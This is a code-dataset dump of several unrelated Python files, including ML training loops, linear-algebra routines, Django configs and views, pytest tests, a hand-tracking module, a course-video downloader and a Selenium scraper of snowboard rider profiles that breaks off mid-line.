model.fit(x=train_features, y=train_labels, batch_size=params[\"batch_size\"], epochs=training_epochs,\n callbacks = callbacks, verbose=2, shuffle=True)\n time5 = time.time()\n training_time += time5 - time4\n\n # Losses plotten\n ml.make_losses_plot(history=history)\n plt.savefig(save_path + \"/training_losses\")\n plt.show()\n\n # Überprüfen wie gut es war\n results = model(test_features)\n loss = float(loss_function(y_pred=transformer.retransform(results), y_true=transformer.retransform(test_labels)))\n print(\"Loss von Durchgang Nummer \", i, \" : \", loss)\n total_losses.append(loss)\n\n #training_time und total loss mitteln:\n avg_total_loss = np.mean(total_losses)\n smallest_loss = np.min(total_losses)\n loss_error = np.std(total_losses)\n training_time = 1 / repeat * training_time\n print(\"Losses of the specific cycle:\", total_losses)\n print(\"average Loss over \", repeat, \"cycles:\", np.mean(total_losses))\n print(\"Das beste Modell (Modell Nr.\", np.argmin(total_losses), \") wird gespeichert\")\n # Modell und config speichern\n model = models[np.argmin(total_losses)]\n model.save(filepath=save_path, save_format=\"tf\")\n (config, index) = ml.save_config(new_model=new_model, save_path=save_path, model=model, learning_rate=params[\"learning_rate\"],\n training_epochs=training_epochs, batch_size=params[\"batch_size\"],\n avg_total_Loss=avg_total_loss, smallest_loss=smallest_loss, loss_error=loss_error, total_losses=total_losses,\n transformer=transformer, training_time=training_time,\n custom=custom, loss_fn=params[\"loss_fn\"], feature_handling= params[\"feature_normalization\"],\n min_delta = params[\"min_delta\"], nr_hidden_layers=params[\"units_nr_layers\"][1], units=params[\"units_nr_layers\"][0])\n\n\n #Überprüfen ob Fortschritt gemacht wurde\n ml.check_progress(model=models[np.argmin(total_losses)], transformer=transformer, test_features=test_features, test_labels=test_labels,\n best_losses=best_losses, project_path=project_path, project_name=project_name,\n index=index, config=config, loss_name=loss_name)\n\n #Ergebnis im dict festhalten\n results_list[model_name] = \"{:.2f}\".format(float(avg_total_loss))\n\n #Ergebnisse speichern\n results_list_pd = pd.DataFrame(\n results_list,\n index = [0]\n )\n results_list_pd = results_list_pd.transpose()\n results_list_pd.to_csv(project_path + \"results\")\n\n\n\n","sub_path":"Executables/Hadronic Process/ML/GridSearch.py","file_name":"GridSearch.py","file_ext":"py","file_size_in_byte":8711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"463306487","text":"n = int(input(\"enter n:\"))\ndig = []\n\nwhile n != 0:\n dig.append(n % 10)\n n = n // 10\n \nprime = False\n\nfor num in dig:\n i = 2\n \n while i < num and num != 1 and num != 0:\n if num % i == 0:\n prime = False\n break\n else:\n prime = True\n i += 1\n \n if prime == True:\n break\n\n \nif prime:\n print(\"At least one prime digit found\")\nelse:\n print(\"No prime digits found\")\n \n","sub_path":"week-2/3-Simple-Algorithms/prime_digit.py","file_name":"prime_digit.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"253807765","text":"import numpy as np\nfrom scipy.linalg import solve_triangular\n\ndef householder(A, kmax=None):\n \"\"\"\n Given a real mxn matrix A, find the reduction to upper triangular matrix R\n using Householder transformations.\n\n :param A: an mxn-dimensional numpy array\n :param kmax: an integer, the number of columns of A to reduce \\\n to upper triangular. If not present, will default to n.\n\n :return R: an mxn-dimensional numpy array containing the upper \\\n triangular matrix\n \"\"\"\n\n m, n = A.shape\n R = (1.0+0j)*A\n if kmax is None:\n kmax = n\n kmax = min(m,kmax)\n for k in range(kmax):\n x = 1.0 * R[k:,k]\n v = (1.0+0j) * x\n arg = np.angle(x[0])\n coeff = np.exp(1j * arg)\n v[0] += coeff * np.linalg.norm(x)\n v = v / np.linalg.norm(v)\n R[k:,k:] -= 2 * np.outer(v, np.dot(v.conj().transpose(), R[k:,k:]))\n return R\n\n\ndef householder_solve(A, b):\n \"\"\"\n Given a real mxm matrix A, use the Householder transformation to solve\n Ax_i=b_i, i=1,2,...,k.\n\n :param A: an mxm-dimensional numpy array\n :param b: an mxk-dimensional numpy array whose columns are the \\\n right-hand side vectors b_1,b_2,...,b_k.\n\n :return x: an mxk-dimensional numpy array whose columns are the \\\n right-hand side vectors x_1,x_2,...,x_k.\n \"\"\"\n m, k = b.shape\n Ahat = np.zeros((m,m+1))\n x = np.zeros((m,k))\n for i in range(k):\n Ahat[:,:m] = 1.0*A\n Ahat[:,m] = 1.0*b[:,i]\n Rhat = householder(Ahat, m)\n x[:,i] = solve_triangular(Rhat[:,:m], Rhat[:,m])\n return x\n\n\ndef householder_qr(A):\n \"\"\"\n Given a real mxn matrix A, use the Householder transformation to find\n the QR factorisation of A.\n\n :param A: an mxn-dimensional numpy array\n\n :return Q: an mxm-dimensional numpy array\n :return R: an mxn-dimensional numpy array\n \"\"\"\n m, n = A.shape\n I = np.eye(m, dtype = complex)\n Ahat = np.zeros((m, n+m), dtype = complex)\n Ahat[:, :n] = A\n Ahat[:, n:] = I\n\n Rhat = householder(Ahat)\n R = Rhat[:,:n]\n Q = Rhat[:,n:].transpose().conj()\n\n return Q, R\n\n\ndef householder_ls(A, b):\n \"\"\"\n Given a real mxn matrix A and an m dimensional vector b, find the\n least squares solution to Ax = b.\n\n :param A: an mxn-dimensional numpy array\n :param b: an m-dimensional numpy array\n\n :return x: an n-dimensional numpy array\n \"\"\"\n m, n = A.shape\n Ahat = np.zeros((m, n+1))\n Ahat[:,:n] = 1.0*A\n Ahat[:, n] = 1.0*b\n\n Rhat = householder(Ahat)\n x = solve_triangular(Rhat[:n,:n], Rhat[:n,n])\n\n return x\n","sub_path":"exercises3.py","file_name":"exercises3.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"305557689","text":"\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('index.urls')),\n path('polls/', include('polls.urls')),\n path('blogs/', include('blog.urls')),\n path('files/', include('files.urls')),\n path('photos/', include('photos.urls')),\n path('users/', include('users.urls')),\n path('watchList/', include('watchlist.urls')),\n path('messageBoard/', include('messageboard.urls')),\n path('music/', include('music.urls')),\n path('mdeditor', include('mdeditor.urls')),\n path('captcha', include('captcha.urls'))\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"350349089","text":"# External imports\nimport unittest\nimport pytest\n\nimport numpy as np\nfrom gpmap import GenotypePhenotypeMap\n\n# Module to test\nfrom ..lasso import EpistasisLasso\n\n\n@pytest.fixture\ndef gpm():\n \"\"\"Create a genotype-phenotype map\"\"\"\n wildtype = \"000\"\n genotypes = [\"000\", \"001\", \"010\", \"100\", \"011\", \"101\", \"110\", \"111\"]\n phenotypes = [0.1, 0.1, 0.5, 0.4, 0.2, 0.8, 0.5, 1.0]\n stdeviations = 0.1\n return GenotypePhenotypeMap(wildtype, genotypes, phenotypes,\n stdeviations=stdeviations)\n\n\nclass TestEpistasisLasso(object):\n\n order = 3\n\n def test_init(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\")\n model.add_gpm(gpm)\n\n # Checks\n check1 = model.order\n check2 = model.model_type\n assert check1 == self.order\n assert check2 == \"local\"\n\n def test_fit(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\")\n model.add_gpm(gpm)\n model.fit()\n # Checks\n check1 = hasattr(model, \"Xbuilt\")\n check2 = hasattr(model, \"coef_\")\n check3 = hasattr(model, \"epistasis\")\n\n # Tests\n assert check1 is True\n assert check2 is True\n assert check3 is True\n assert \"fit\" in model.Xbuilt\n\n\n def test_predict(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\")\n model.add_gpm(gpm)\n model.fit()\n check1 = model.predict(X='fit')\n\n # Tests\n assert \"predict\" in model.Xbuilt\n\n def test_score(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\", alpha=0.1)\n model.add_gpm(gpm)\n model.fit()\n score = model.score()\n # Tests\n assert score >= 0\n assert score <= 1\n\n def test_hypothesis(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\")\n model.add_gpm(gpm)\n model.fit()\n # Checks\n check1 = model.hypothesis(thetas=model.coef_)\n # Tests\n True\n\n def test_lnlikelihood(self, gpm):\n model = EpistasisLasso(order=self.order, model_type=\"local\")\n model.add_gpm(gpm)\n model.fit()\n\n # Calculate lnlikelihood\n lnlike = model.lnlikelihood()\n assert lnlike.dtype == float\n","sub_path":"epistasis/models/linear/tests/test_lasso.py","file_name":"test_lasso.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"12048574","text":"from util import Queue\n\ndef earliest_ancestor(ancestors, starting_node):\n ancestors = [(1, 3), (2, 3), (3, 6), (5, 6), (5, 7), (4, 5), (4, 8), (8, 9), (11, 8), (10, 1)]\n\n # Create a graph\n graph = {}\n # Keep a track of visited nodes\n visited = set()\n # Keeps a track of the path when traversing the graph\n path = []\n # add empty sets to the graph with respective indexes\n for i in ancestors:\n if i[0] not in graph:\n graph[i[0]] = set()\n if i[1] not in graph:\n graph[i[1]] = set()\n print('graph', graph[i[0]])\n # we add the edges to the nodes\n for ancestor in ancestors:\n if ancestor[0] in graph and ancestor[1] in graph:\n graph[ancestor[1]].add(ancestor[0])\n \n # Create an empty queue\n queue = Queue()\n # Add the initial vertex to the path\n path.append(starting_node)\n # Then add the path to the queue, should be initialized as a empty list\n queue.enqueue(path)\n\n # This checks if the initial node has no ancestors, if it does not it returns '-1' \n for i in graph:\n if starting_node is i and bool(graph[i]) is False:\n return -1\n\n # while we have something in our queue.. \n while queue.size() > 0:\n # Dequeue the first path\n path = queue.dequeue() \n # We grab the last vertex from the path\n last_vertex = path[-1] \n # We check if it has NOT been visited..\n if last_vertex not in visited:\n # if not, we add it to the visited dic\n visited.add(last_vertex)\n # iterate over the last vertex's neighbors..\n for neighbor in graph[last_vertex]:\n # we check if the neighbor is NOT marked as visited...\n if neighbor not in visited:\n # if it is not, we make a copy of the path\n path_copy = path.copy()\n # we append the neighbor to the copy of the path\n path_copy.append(neighbor)\n # then we add the copy of the path to the queue\n queue.enqueue(path_copy)\n # we return the last vertex, indicating the farthest node in the ancestry chain\n return last_vertex\n\nif __name__=='__main__':\n earliest_ancestor((1,2), 4)\n\n","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"252338195","text":"import multiprocessing\n\n# アプリケーション指定\nwsgi_app = 'app:app'\n# ワーカークラス指定\nworker_class = \"uvicorn.workers.UvicornWorker\"\n# IPポートバインド\nbind = \"0.0.0.0:5000\"\n# 実行ワーカー数\nworkers = 2\n#workers = multiprocessing.cpu_count() * 1 + 1\n# デーモン無効\ndaemon = False\n# ホットリロード\nreload=True\n# タイムアウト\ntimeout = 10\n","sub_path":"Development_Setup/FastAPI/src/gunicorn.conf.py","file_name":"gunicorn.conf.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"95679929","text":"import cv2\r\nimport mediapipe as mp\r\nimport time\r\nimport math\r\n\r\n\r\nclass handDetector():\r\n def __init__(self, static_mode=False, max_hands=2, min_detection_confidence=0.5, min_tracking_confidence=0.5):\r\n self.static_mode = static_mode\r\n self.max_hands = max_hands\r\n self.min_detection_confidence = min_detection_confidence\r\n self.min_tracking_confidence = min_tracking_confidence\r\n\r\n self.mpHands = mp.solutions.hands\r\n self.hands = self.mpHands.Hands(self.static_mode, self.max_hands,\r\n self.min_detection_confidence, self.min_tracking_confidence)\r\n self.mpDraw = mp.solutions.drawing_utils\r\n\r\n def findHands(self, img, draw=True):\r\n # hands object uses RGB images only\r\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n self.results = self.hands.process(imgRGB)\r\n # print(results.multi_hand_landmarks)\r\n\r\n if self.results.multi_hand_landmarks:\r\n for handLms in self.results.multi_hand_landmarks: # for each hand\r\n if draw:\r\n self.mpDraw.draw_landmarks(\r\n img, handLms, self.mpHands.HAND_CONNECTIONS)\r\n\r\n return img\r\n\r\n def findPosition(self, img, handNo=0, draw=True):\r\n\r\n self.lmList = []\r\n if self.results.multi_hand_landmarks:\r\n myHand = self.results.multi_hand_landmarks[handNo]\r\n for id, lm in enumerate(myHand.landmark):\r\n # print(id, lm)\r\n h, w, c = img.shape\r\n # (x, y) are ratio of the point on img\r\n cx, cy = int(lm.x*w), int(lm.y*h)\r\n #print(id, cx, cy)\r\n self.lmList.append([id, cx, cy])\r\n if draw:\r\n cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\r\n\r\n return self.lmList\r\n\r\n def fingersUp(self):\r\n tipIds = [4, 8, 12, 16, 20]\r\n OpenFingers = []\r\n # FOR THUMB:\r\n if self.lmList[tipIds[0]][1] > self.lmList[tipIds[0]-1][1]: # lmlist[id][x][y]\r\n OpenFingers.append(1)\r\n else:\r\n OpenFingers.append(0)\r\n\r\n # Remaining Fingers:\r\n for id in range(1, 5):\r\n if self.lmList[tipIds[id]][2] < self.lmList[tipIds[id]-2][2]: # lmlist[id][x][y]\r\n OpenFingers.append(1)\r\n else:\r\n OpenFingers.append(0)\r\n # print(OpenFingers)\r\n return OpenFingers\r\n\r\n def findDistance(self, img, p1, p2):\r\n x1, y1 = self.lmList[p1][1], self.lmList[p1][2]\r\n x2, y2 = self.lmList[p2][1], self.lmList[p2][2]\r\n cx, cy = (x1 + x2) // 2, (y1 + y2) // 2\r\n\r\n cv2.circle(img, (x1, y1), 10, (255, 0, 255), cv2.FILLED)\r\n cv2.circle(img, (x2, y2), 10, (255, 0, 255), cv2.FILLED)\r\n cv2.circle(img, (cx, cy), 10, (255, 0, 255), cv2.FILLED)\r\n cv2.line(img, (x1, y1), (x2, y2), (255, 0, 255), 3)\r\n\r\n length = math.hypot(x2-x1, y2-y1)\r\n # print(length)\r\n\r\n # if length < 40:\r\n # cv2.circle(img, (cx, cy), 10, (255, 0, 0), cv2.FILLED)\r\n\r\n return length, [x1, y1, x2, y2, cx, cy]\r\n\r\n\r\ndef main():\r\n pTime = 0\r\n cTime = 0\r\n\r\n cap = cv2.VideoCapture(0)\r\n detector = handDetector() # using default parameters\r\n while True:\r\n success, img = cap.read()\r\n img = detector.findHands(img)\r\n lmList = detector.findPosition(img)\r\n if len(lmList) != 0:\r\n print(lmList[4]) # print position of 4th landmark\r\n\r\n cTime = time.time()\r\n fps = 1/(cTime - pTime)\r\n pTime = cTime\r\n\r\n cv2.putText(img, str(int(fps)), (10, 70),\r\n cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 2)\r\n\r\n cv2.imshow(\"Image\", img)\r\n cv2.waitKey(1)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"HandTrackingModule.py","file_name":"HandTrackingModule.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"644008063","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Q\n\nfrom talk import models as m\nfrom talk import forms as f\n\n\n@login_required\ndef message(request, user_id):\n user = User.objects.get(id=user_id)\n try:\n conv = m.Conversation.objects.get(\n Q(user_1=request.user) & Q(user_2=user))\n except m.Conversation.DoesNotExist:\n try:\n conv = m.Conversation.objects.get(\n Q(user_1=user) & Q(user_2=request.user))\n except m.Conversation.DoesNotExist:\n conv = None\n messages = None\n if conv:\n messages = m.Message.objects.filter(conversation=conv)\n form = f.MessageForm(request.POST or None)\n if form.is_valid():\n if conv is None:\n conv = m.Conversation(user_1=request.user, user_2=user)\n conv.save()\n message = form.cleaned_data.get('content')\n msg = m.Message(conversation=conv, user=request.user, content=message)\n msg.save()\n return redirect('messages:message', user_id)\n args = dict(user=user, form=form, messages=messages)\n return render(request, 'talk/message_details.html', args)\n\n\n@login_required\ndef messages(request):\n args = dict()\n try:\n conv = m.Conversation.objects.filter(\n Q(user_1=request.user) | Q(user_2=request.user))\n except m.Conversation.DoesNotExist:\n conv = None\n args = dict(conv=conv)\n return render(request, 'talk/message_list.html', args)\n","sub_path":"talk/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"409167004","text":"'''\n@author: Mike McMillan\n12.1 Recursive Function part 1\n'''\ndef factorial(n):\n if n == 1:\n return n\n else:\n return n*factorial(n-1)\n\ndef main():\n numList = [1, 2, 3, 4, 5]\n for num in numList:\n print(num, factorial(num))\n\nif __name__ == '__main__': main()\n","sub_path":"Python3/MikeMcMillan/recursion_factorial.py","file_name":"recursion_factorial.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"338051844","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/watchme/client/remove.py\n# Compiled at: 2020-04-10 14:08:50\n# Size of source mod 2**32: 935 bytes\n\"\"\"\n\nCopyright (C) 2019-2020 Vanessa Sochat.\n\nThis Source Code Form is subject to the terms of the\nMozilla Public License, v. 2.0. If a copy of the MPL was not distributed\nwith this file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n\"\"\"\nfrom watchme import get_watcher\nfrom watchme.logger import bot\n\ndef main(args, extra):\n \"\"\"activate one or more watchers\n \"\"\"\n name = args.watcher[0]\n watcher = get_watcher(name, base=(args.base), create=False)\n if args.delete:\n watcher.delete()\n else:\n if extra is None:\n bot.exit('Provide tasks to remove, or --delete for entire watcher.')\n for task in extra:\n watcher.remove_task(task)","sub_path":"pycfiles/watchme-0.0.28-py3.7/remove.cpython-37.py","file_name":"remove.cpython-37.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"447737645","text":"import requests\nimport re\nfrom pyquery import PyQuery as py\nimport os\n\n# params\ncourse_url = \"http://ocw.nctu.edu.tw/course_detail-v.php?bgid=1&gid=1&nid=263\"\ntest_vedio_url = \"http://ocwvideo.nctu.edu.tw/pub/mp4/mxa001_mp4/mxa001_110914.mp4\"\npath = 'videos/'\n# set headers\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36\"\n}\n\n# get the page_source\nresponse = requests.get(course_url, headers=headers)\n\n# get hrefs\nvedio_urls = []\ndoc = py(response.text)\nitems = doc(\".table.table-bordered.table-striped\")\nfor item in items('a').items():\n if item.attr('href') and item.text() == \"MP4 下載\":\n vedio_urls.append(item.attr('href'))\n print(item.attr('href'))\n\n\n# refer to https://www.cnblogs/^http:\\/\\/www\\..+\\.mp4$/.com/linxiyue/p/8244724.html\ndef download_video(url, fname):\n with requests.get(url, headers=headers, stream=True) as r:\n content_size = int(r.headers['content-length'])\n with open(fname, 'wb')as f:\n n = 1\n for i in r.iter_content(chunk_size=1024):\n loaded = n * 1024.0 / content_size\n f.write(i)\n print(\"\\r processed {0:%}\".format(loaded), end=\"\")\n n += 1\n print('end this %s' % url)\n\n\n# start download\nif not os.path.exists(path):\n os.makedirs(path)\nfor v_url in vedio_urls:\n print(\"start download from %s\" % v_url)\n fname = v_url.split('/')[-1]\n download_video(v_url, path + fname)\n","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"56415966","text":"#########################################\n#########################################\n# 1. Activate pipenv shell\n# -- pipenv shell\n# 2. Run Python Script\n# -- python *filename*\n# 3. End python script\n# -- ctr c\n# 4. Exit pipenv shell\n# -- exit\n#########################################\n\n\n#imports\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException as ex\n# import time\nfrom bs4 import BeautifulSoup\n# import pandas as pd\n# import re\n# import os\n#website urls\nbase_url = 'http://www.worldsnowboarding.org/'\nathletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=SS&gender=M#table' #mens ss page 1\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/27/?type=SS&gender=M' #mens ss page 27\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/9/?type=SS&gender=M' #mens ss page 9\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=HP&gender=M#table' #mens hp page 1\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=BA&gender=M#table' #mens ba page 1\n\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=SS&gender=W#table' #womens ss page 1\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=HP&gender=W#table' #womens hp page 1\n# athletes_url = 'http://www.worldsnowboarding.org/points-lists/?type=BA&gender=W#table' #womens ba page 1\n\n# Chrome session\ndriver = webdriver.Chrome(executable_path='/Users/rcadby/Sites/shreds_scraper/chromedriver')\ndriver.get(athletes_url)\ndriver.implicitly_wait(100)\n\n# name the output file to write to local disk\nout_filename = \"./csv/snowboard-profiles.csv\"\n# header of csv file to be written\nheaders = \"lastName, firstName, position, points, sponsors, age, nationality, nationality_full, stance, height, residence, resort, website, facebook, twitter, rider_concat_id, \\n\"\n\n# opens file, and writes headers\nf = open(out_filename, \"w\")\nf.write(headers)\n\n# initiate variables\ncountry_array = []\nscore_array = []\nposition_array = []\nlastname_array = []\nfirstname_array = []\nnationality_abr = []\n\ndef assign_arrays(type):\n # get full country name from table and add to array\n try:\n country_array.append(type.find(\"span\", {\"class\": \"icon-flag-medium\"})['oldtitle'].split(',')[0].lower())\n except:\n country_array.append('')\n # get rider score from table and add to array\n try:\n score_array.append(float(type.find(\"td\", {\"class\": \"last\"}).text))\n except:\n score_array.append('')\n # get position from table and add to array\n try:\n position_str = type.findChildren()[0].span.text\n position = int(position_str[:-1])\n position_array.append(position)\n except:\n position_array.append(0)\n # get rider last name\n try:\n lastname_array.append(type.find(\"a\", {\"class\": \"ranking-table-link\"}).text.split(',')[0])\n except:\n lastname_array.append('')\n # get rider first name\n try:\n firstname_array.append(type.find(\"a\", {\"class\": \"ranking-table-link\"}).text.split(',')[1])\n except:\n firstname_array.append('')\n # get full nationality\n try:\n nationality_full_array = type.find(\"span\", {\"class\": \"icon-flag-medium\"}).text.lower()\n nationality_abr.append(nationality_full_array)\n except:\n nationality_abr.append('')\n\n\n\n\n# get initial page soup\npage_soup = BeautifulSoup(driver.page_source, 'html.parser', from_encoding='utf8')\n\n# count number of pages\npage_count = page_soup.find('div', attrs={'class': 'pagination-links'}).find_all('a')\npages = []\nfor link in page_count:\n pages.append(link)\npage_total = pages[-2].text.strip()\npage_total = int(page_total) + 20\nprint(\"page total: \" + str(page_total))\n# initiate empty variable to see if it has already read this page\nlast_position_check = None\n\nfor i in range(page_total): # for each page\n\n # count profiles per page\n profile_count = len(driver.find_elements_by_class_name('ranking'))\n print('number of riders ' + str(profile_count))\n\n \n # wait for table to appear\n WebDriverWait(driver, 10).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \".block-table\"))\n )\n rank_page_soup = BeautifulSoup(driver.page_source, 'html.parser', from_encoding='utf8')\n # profile a tags\n profile_links = rank_page_soup.find_all(class_=\"ranking-table-link\")\n # get urls from a tags\n rider_link_array = []\n for profile_link in profile_links:\n rider_link_input = 'http://www.worldsnowboarding.org/' + profile_link.get('href')\n # rider_link_input = profile_link.get('href')\n rider_link_array.append(rider_link_input)\n\n\n # get whole rank row\n profile_data = rank_page_soup.find_all(\"tr\", {\"class\":\"ranking\"})\n country_array.clear()\n score_array.clear()\n position_array.clear()\n lastname_array.clear()\n firstname_array.clear()\n nationality_abr.clear()\n # get array of full country names\n for row in profile_data:\n assign_arrays(row)\n\n\n if i != 0 and position_array[(profile_count - 1)] == last_position_check:\n # navigate to link\n print('FAIL: duplicate page trial')\n print('current url: ' + driver.current_url)\n page_next = driver.find_element_by_class_name('next')\n page_next.click()\n print('next page url: ' + driver.current_url)\n\n # count profiles per page\n profile_count = len(driver.find_elements_by_class_name('ranking'))\n print('number of riders ' + str(profile_count))\n\n \n # wait for table to appear\n element = WebDriverWait(driver, 10).until(\n EC.visibility_of_element_located((By.CSS_SELECTOR, \".block-table\"))\n )\n rank_page_soup = BeautifulSoup(driver.page_source, 'html.parser', from_encoding='utf8')\n # profile a tags\n profile_links = rank_page_soup.find_all(class_=\"ranking-table-link\")\n # get urls from a tags\n rider_link_array = []\n for profile_link in profile_links:\n rider_link_input = 'http://www.worldsnowboarding.org/' + profile_link.get('href')\n # rider_link_input = profile_link.get('href')\n rider_link_array.append(rider_link_input)\n\n # get whole rank row\n profile_data = rank_page_soup.find_all(\"tr\", {\"class\":\"ranking\"})\n country_array.clear()\n score_array.clear()\n position_array.clear()\n lastname_array.clear()\n firstname_array.clear()\n nationality_abr.clear()\n # get array of full country names\n for row in profile_data:\n assign_arrays(row)\n else:\n pass\n\n\n \n print('profile links:')\n print(profile_links) # print all a tags to profiles\n print('rider links:')\n print(rider_link_array) # print all urls to profiles\n print('full countries:')\n print(country_array)\n print('scores:')\n print(score_array)\n print('positions:')\n print(position_array)\n print('last names:')\n print(lastname_array)\n print('first names:')\n print(firstname_array)\n \n loop_counter = 0\n for rider_link in rider_link_array:\n # initiate list for rider stats\n profile = ['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']\n # assign full country name to profile\n profile[7] = country_array[loop_counter]\n profile[0] = lastname_array[loop_counter]\n profile[1] = firstname_array[loop_counter]\n profile[2] = position_array[loop_counter]\n profile[3] = score_array[loop_counter]\n\n first_name_concat = firstname_array[loop_counter].strip().lower()\n last_name_concat = lastname_array[loop_counter].strip().lower()\n nationality_concat = nationality_abr[loop_counter].strip()\n profile[15] = str(first_name_concat + last_name_concat + nationality_concat)\n\n # click on rider profile\n driver.get(rider_link)\n # get html on rider page and parse\n profile_soup = BeautifulSoup(driver.page_source, 'html.parser', from_encoding='utf8')\n # get rider name\n try:\n # rider_name = profile_soup.select('h1.rider-label')[0].text.strip()\n # profile[0] = rider_name\n \n # get rider sponsors\n rider_sponsor_soup = profile_soup.find('div', attrs={'class': 'sponsor-list'})\n if rider_sponsor_soup is None:\n profile[4] = ''\n else:\n rider_sponsor_soup_conf = rider_sponsor_soup.ul.find_all('li')\n sponsors = ''\n for litag in rider_sponsor_soup_conf:\n sponsor_item = litag.text.strip()\n sponsors += sponsor_item + ' | '\n\n profile[4] = sponsors\n\n profile_code_soup = profile_soup.find_all('ul', attrs={'class': 'plain-list'})\n for ultag in profile_code_soup:\n profile_li = ultag.find_all('li')\n\n for litag in profile_li:\n # get data\n profile_info = litag.getText()\n # clean data\n profile_info = profile_info.replace(\"'\", 'ft.')\n profile_info = profile_info.replace('\"', 'in.')\n profile_info = profile_info.replace(',', '|')\n\n # split profile info by title and value using a colon\n profile_type= profile_info.split(\":\", 1)[0].lower()\n profile_stat = profile_info.split(\":\", 1)[1].strip().replace('\\n', ' ') #replace new line value with space\n\n print(profile_type, profile_stat)\n\n # check nationality\n if profile_type == 'age':\n profile[5]=profile_stat\n elif profile_type == 'nationality':\n profile[6]=profile_stat\n elif profile_type == 'stance':\n profile[8]=profile_stat\n elif profile_type == 'height':\n profile[9]=profile_stat\n elif profile_type == 'residence':\n profile[10]=profile_stat\n elif profile_type == 'home resort':\n profile[11]=profile_stat\n elif profile_type == 'website':\n profile[12]=profile_stat\n elif profile_type == 'facebook':\n profile[13]=profile_stat\n elif profile_type == 'twitter':\n profile[14]=profile_stat\n else:\n pass\n\n profile_str = ', '.join(str(x) for x in profile)\n print('PROFILE STRING: ' + profile_str)\n f.write(profile_str)\n if loop_counter == 49:\n last_position_check = profile[2]\n\n\n # go back to initial page\n driver.execute_script(\"window.history.go(-1)\")\n\n #start new line for new rider profile\n f.write(\"\\n\")\n except:\n print('FAIL: 404 go back')\n # go back to initial page\n driver.execute_script(\"window.history.go(-1)\")\n\n table_soup = BeautifulSoup(driver.page_source, 'html.parser', from_encoding='utf8')\n # find url in table\n url = rider_link.strip('http://www.worldsnowboarding.org/')\n find_link = table_soup.select_one(\"a[href*='\" + url + \"']\")\n # find parent of url - this is the row that has all the rider info\n parent = find_link.find_parent('tr', attrs={'class': 'ranking'})\n stat_array = parent.find_all('td')\n\n profile[1] = 